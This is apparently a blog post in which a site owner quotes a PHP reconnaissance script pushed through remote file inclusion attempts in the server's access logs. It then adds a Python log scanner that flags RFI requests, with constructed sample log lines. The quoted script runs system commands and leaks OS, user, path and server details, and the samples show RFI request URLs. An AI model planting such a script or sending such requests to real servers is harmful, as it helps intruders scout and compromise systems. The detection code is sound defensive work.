Are Nigerians Evolving From The 419 Letters?
I was going through my access logs to see what nasties have been thrown at me since the last time.
Amongst the normal enter_your_RFI_exploit_here I saw this script being pushed onto the server:
<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
exit;
?>
As you can see, it's just a preamble script to detect whether the server is vulnerable or not. If they are evolving from the ancient scams, they sure have a long way to go to achieve the correct 1337h4x0r levels that other RFI pushers have achieved. So guys, give us more caps!
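For anyone doing the same kind of access-log review, here is an added example (not part of the original post) that flags requests whose query parameter value is a remote URL, which is how an RFI push of a script like the one above shows up in the log. The log lines are constructed, the combined log format is assumed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# A parameter value that *starts* with a remote scheme is the RFI signature.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)

def decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding (double encoding)."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def find_rfi_attempts(lines):
    """Return (client, path, param, remote_url, status) per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl removes one encoding layer; decode() removes the rest.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = decode(value)
            if REMOTE_RE.match(value):
                hits.append((client, parts.path, name, value, int(status)))
    return hits

# Constructed sample lines (documentation addresses and example hosts only).
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2008:04:11:52 +0000] "GET /index.php?page=http://files.example.net/brat.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '203.0.113.9 - - [12/Mar/2008:04:12:03 +0000] "GET /view.php?inc=http%253A%252F%252Ffiles.example.net%252Fid.txt HTTP/1.0" 404 312 "-" "-"',
    '192.0.2.44 - - [12/Mar/2008:04:15:40 +0000] "GET /login.php?next=%2Faccount HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Mar/2008:04:16:02 +0000] "GET /search.php?q=what+is+http%3A%2F%2F HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE):
        print(hit)
```

The status code is kept for triage only: a 200 means the page was served, not that the include happened, so hits on 200 are the ones to check against the PHP configuration and the response body.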